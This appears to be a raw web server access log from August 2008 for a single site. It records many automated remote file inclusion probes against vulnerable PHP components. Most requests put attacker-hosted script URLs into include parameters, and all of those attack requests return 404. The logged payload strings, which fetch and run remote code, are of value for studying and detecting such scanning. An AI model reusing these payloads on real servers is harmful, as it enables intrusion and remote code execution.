216.183.105.230 - - [03/Aug/2008:19:13:07 -0700] "GET /logs/access_080630.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
216.183.105.230 - - [03/Aug/2008:19:13:08 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
216.183.105.230 - - [03/Aug/2008:19:13:10 -0700] "GET /logs/access_080707.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
216.183.105.230 - - [03/Aug/2008:19:14:09 -0700] "GET /logs/access_080519.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
77.92.80.1 - - [03/Aug/2008:19:15:06 -0700] "GET /logs/access_080505.log//ashnews.php?pathtoashnews=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
77.92.80.1 - - [03/Aug/2008:19:15:07 -0700] "GET //ashnews.php?pathtoashnews=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
77.92.80.1 - - [03/Aug/2008:19:15:07 -0700] "GET /logs//ashnews.php?pathtoashnews=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
77.92.80.1 - - [03/Aug/2008:19:15:12 -0700] "GET /logs/access_080414.log//ashnews.php?pathtoashnews=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
81.169.158.65 - - [03/Aug/2008:19:15:29 -0700] "GET /logs/access_080505.log//ashnews.php?pathtoashnews=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
81.169.158.65 - - [03/Aug/2008:19:15:29 -0700] "GET //ashnews.php?pathtoashnews=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
81.169.158.65 - - [03/Aug/2008:19:15:29 -0700] "GET /logs//ashnews.php?pathtoashnews=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
81.169.158.65 - - [03/Aug/2008:19:15:40 -0700] "GET /logs/access_080414.log//ashnews.php?pathtoashnews=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
77.92.80.1 - - [03/Aug/2008:19:15:58 -0700] "GET /logs/access_080505.log//ashnews.php?pathtoashnews=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
77.92.80.1 - - [03/Aug/2008:19:15:59 -0700] "GET //ashnews.php?pathtoashnews=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
77.92.80.1 - - [03/Aug/2008:19:15:59 -0700] "GET /logs//ashnews.php?pathtoashnews=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
77.92.80.1 - - [03/Aug/2008:19:16:01 -0700] "GET /logs/access_080414.log//ashnews.php?pathtoashnews=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
208.80.193.46 - - [03/Aug/2008:19:18:09 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; OptusNetDSL6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.mathstamps.com"
194.79.75.195 - - [03/Aug/2008:19:19:15 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.geocities.com/elmaningrum/test.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.mathstamps.com"
194.79.75.195 - - [03/Aug/2008:19:19:16 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.geocities.com/elmaningrum/test.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.mathstamps.com"
81.169.158.65 - - [03/Aug/2008:19:19:57 -0700] "GET /logs/access_080414.log//ashnews.php?pathtoashnews=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
81.169.158.65 - - [03/Aug/2008:19:19:57 -0700] "GET //ashnews.php?pathtoashnews=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
81.169.158.65 - - [03/Aug/2008:19:19:57 -0700] "GET /logs//ashnews.php?pathtoashnews=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
81.169.158.65 - - [03/Aug/2008:19:20:14 -0700] "GET /logs/access_080421.log//ashnews.php?pathtoashnews=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
74.53.240.146 - - [03/Aug/2008:19:20:15 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://legalref.ru/config/idscan.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.mathstamps.com"
74.53.240.146 - - [03/Aug/2008:19:20:15 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://legalref.ru/config/idscan.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.mathstamps.com"
74.53.240.146 - - [03/Aug/2008:19:21:02 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.proostjes.be/calendar/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
66.90.73.113 - - [03/Aug/2008:19:21:12 -0700] "GET /logs/access_080630.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
66.90.73.113 - - [03/Aug/2008:19:21:12 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
66.90.73.113 - - [03/Aug/2008:19:21:17 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
195.39.5.203 - - [03/Aug/2008:19:22:13 -0700] "GET /logs/access_080519.log//skin/zero_vote/error.php?dir=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.39.5.203 - - [03/Aug/2008:19:22:14 -0700] "GET //skin/zero_vote/error.php?dir=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.39.5.203 - - [03/Aug/2008:19:22:15 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
74.53.240.146 - - [03/Aug/2008:19:22:56 -0700] "GET /logs/access_080630.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.mathstamps.com"
74.53.240.146 - - [03/Aug/2008:19:22:56 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.mathstamps.com"
74.53.240.146 - - [03/Aug/2008:19:22:56 -0700] "GET /logs/access_080707.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.mathstamps.com"
74.53.240.146 - - [03/Aug/2008:19:22:56 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.mathstamps.com"
146.155.63.15 - - [03/Aug/2008:19:23:02 -0700] "GET /logs//include/write.php?dir=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
146.155.63.15 - - [03/Aug/2008:19:23:02 -0700] "GET /logs/access_080707.log//include/write.php?dir=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
146.155.63.15 - - [03/Aug/2008:19:23:02 -0700] "GET //include/write.php?dir=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
81.169.158.65 - - [03/Aug/2008:19:23:19 -0700] "GET /logs/access_080630.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
81.169.158.65 - - [03/Aug/2008:19:23:20 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
81.169.158.65 - - [03/Aug/2008:19:23:20 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
146.155.63.15 - - [03/Aug/2008:19:23:27 -0700] "GET /logs/access_080630.log//include/write.php?dir=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
212.117.89.191 - - [03/Aug/2008:19:23:39 -0700] "GET //include.php?path[docroot]=http://www.mvpseminars.com/language/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
74.53.240.146 - - [03/Aug/2008:19:24:14 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.53.240.146 - - [03/Aug/2008:19:24:34 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
62.231.161.4 - - [03/Aug/2008:19:24:34 -0700] "GET /logs/access_080324.log/templates/headline_temp.php?nst_inc=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.mathstamps.com"
62.231.161.4 - - [03/Aug/2008:19:24:35 -0700] "GET /templates/headline_temp.php?nst_inc=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.mathstamps.com"
62.231.161.4 - - [03/Aug/2008:19:24:35 -0700] "GET /logs/templates/headline_temp.php?nst_inc=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.mathstamps.com"
195.39.5.203 - - [03/Aug/2008:19:24:43 -0700] "GET /logs/access_080428.log//skin/zero_vote/error.php?dir=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
62.231.161.4 - - [03/Aug/2008:19:25:02 -0700] "GET /logs/access_080519.log/templates/headline_temp.php?nst_inc=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.mathstamps.com"
216.183.105.230 - - [03/Aug/2008:19:25:15 -0700] "GET /logs/access_080609.log%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
195.39.5.203 - - [03/Aug/2008:19:26:58 -0700] "GET //skin/zero_vote/error.php?dir=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
194.85.89.114 - - [03/Aug/2008:19:27:05 -0700] "GET /logs/access_080630.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://uaedesign.com/config/idfx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
194.85.89.114 - - [03/Aug/2008:19:27:06 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://uaedesign.com/config/idfx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
194.85.89.114 - - [03/Aug/2008:19:27:06 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://uaedesign.com/config/idfx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
194.85.89.114 - - [03/Aug/2008:19:27:18 -0700] "GET /logs/access_080707.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://uaedesign.com/config/idfx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
65.98.89.43 - - [03/Aug/2008:19:27:32 -0700] "GET /logs/access_080630.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
65.98.89.43 - - [03/Aug/2008:19:27:33 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
65.98.89.43 - - [03/Aug/2008:19:27:33 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
65.98.89.43 - - [03/Aug/2008:19:28:06 -0700] "GET /logs/access_080630.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
65.98.89.43 - - [03/Aug/2008:19:28:07 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
65.98.89.43 - - [03/Aug/2008:19:28:07 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
66.90.73.113 - - [03/Aug/2008:19:28:48 -0700] "GET /logs/access_080630.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
66.90.73.113 - - [03/Aug/2008:19:28:48 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
66.90.73.113 - - [03/Aug/2008:19:28:48 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
216.183.105.230 - - [03/Aug/2008:19:29:15 -0700] "GET /logs/access_080421.log%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
74.53.240.146 - - [03/Aug/2008:19:29:25 -0700] "GET /logs/access_080630.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.53.240.146 - - [03/Aug/2008:19:29:25 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.53.240.146 - - [03/Aug/2008:19:29:25 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.53.240.146 - - [03/Aug/2008:19:29:26 -0700] "GET /logs/access_080707.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
216.183.105.230 - - [03/Aug/2008:19:29:27 -0700] "GET /logs/access_080707.log%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
74.53.240.146 - - [03/Aug/2008:19:29:29 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
66.90.73.113 - - [03/Aug/2008:19:30:00 -0700] "GET /logs/access_080707.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
89.111.172.23 - - [03/Aug/2008:19:30:11 -0700] "GET /logs/access_080505.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.111.172.23 - - [03/Aug/2008:19:30:11 -0700] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
64.185.237.77 - - [03/Aug/2008:19:30:36 -0700] "GET //login.php?dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
216.183.105.230 - - [03/Aug/2008:19:31:34 -0700] "GET /logs/access_080616.log%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
217.172.161.101 - - [03/Aug/2008:19:31:38 -0700] "GET /templates/headline_temp.php?nst_inc=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
216.183.105.230 - - [03/Aug/2008:19:32:59 -0700] "GET /logs/access_080421.log%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
74.53.240.146 - - [03/Aug/2008:19:33:12 -0700] "GET /logs/access_080630.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.proostjes.be/calendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.53.240.146 - - [03/Aug/2008:19:33:12 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.proostjes.be/calendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.53.240.146 - - [03/Aug/2008:19:33:12 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.proostjes.be/calendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.53.240.146 - - [03/Aug/2008:19:33:12 -0700] "GET /logs/access_080707.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.proostjes.be/calendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
81.169.158.65 - - [03/Aug/2008:19:33:27 -0700] "GET /logs/access_080707.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
89.111.172.23 - - [03/Aug/2008:19:34:46 -0700] "GET /templates/headline_temp.php?nst_inc=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
217.172.161.101 - - [03/Aug/2008:19:34:58 -0700] "GET /logs/access_080324.log/templates/headline_temp.php?nst_inc=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
217.172.161.101 - - [03/Aug/2008:19:34:58 -0700] "GET /logs/templates/headline_temp.php?nst_inc=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
194.85.89.114 - - [03/Aug/2008:19:34:59 -0700] "GET /logs/access_080630.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://uaedesign.com/config/idfx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
194.85.89.114 - - [03/Aug/2008:19:34:59 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://uaedesign.com/config/idfx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
194.85.89.114 - - [03/Aug/2008:19:35:00 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://uaedesign.com/config/idfx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
194.85.89.114 - - [03/Aug/2008:19:35:05 -0700] "GET /logs/access_080707.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://uaedesign.com/config/idfx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
74.53.240.146 - - [03/Aug/2008:19:35:10 -0700] "GET /logs/access_080630.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.proostjes.be/calendar/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.53.240.146 - - [03/Aug/2008:19:35:10 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.proostjes.be/calendar/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.53.240.146 - - [03/Aug/2008:19:35:10 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.proostjes.be/calendar/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.53.240.146 - - [03/Aug/2008:19:35:11 -0700] "GET /logs/access_080707.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.proostjes.be/calendar/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
217.172.161.101 - - [03/Aug/2008:19:35:31 -0700] "GET /logs/access_080519.log/templates/headline_temp.php?nst_inc=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
81.169.158.65 - - [03/Aug/2008:19:36:40 -0700] "GET /logs/access_080630.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
81.169.158.65 - - [03/Aug/2008:19:36:40 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
81.169.158.65 - - [03/Aug/2008:19:36:41 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
66.90.73.113 - - [03/Aug/2008:19:37:04 -0700] "GET /logs/access_080630.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
66.90.73.113 - - [03/Aug/2008:19:37:09 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
66.90.73.113 - - [03/Aug/2008:19:37:09 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
66.90.73.113 - - [03/Aug/2008:19:37:14 -0700] "GET /logs/access_080707.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
89.111.172.23 - - [03/Aug/2008:19:37:17 -0700] "GET /logs/access_080324.log/templates/headline_temp.php?nst_inc=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.111.172.23 - - [03/Aug/2008:19:37:18 -0700] "GET /logs/templates/headline_temp.php?nst_inc=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
66.90.73.113 - - [03/Aug/2008:19:37:24 -0700] "GET /logs/access_080630.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
66.90.73.113 - - [03/Aug/2008:19:37:24 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
66.90.73.113 - - [03/Aug/2008:19:37:24 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
66.90.73.113 - - [03/Aug/2008:19:37:25 -0700] "GET /logs/access_080707.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
89.111.172.23 - - [03/Aug/2008:19:37:31 -0700] "GET /logs/access_080519.log/templates/headline_temp.php?nst_inc=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
66.90.73.113 - - [03/Aug/2008:19:38:44 -0700] "GET /logs/access_080707.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
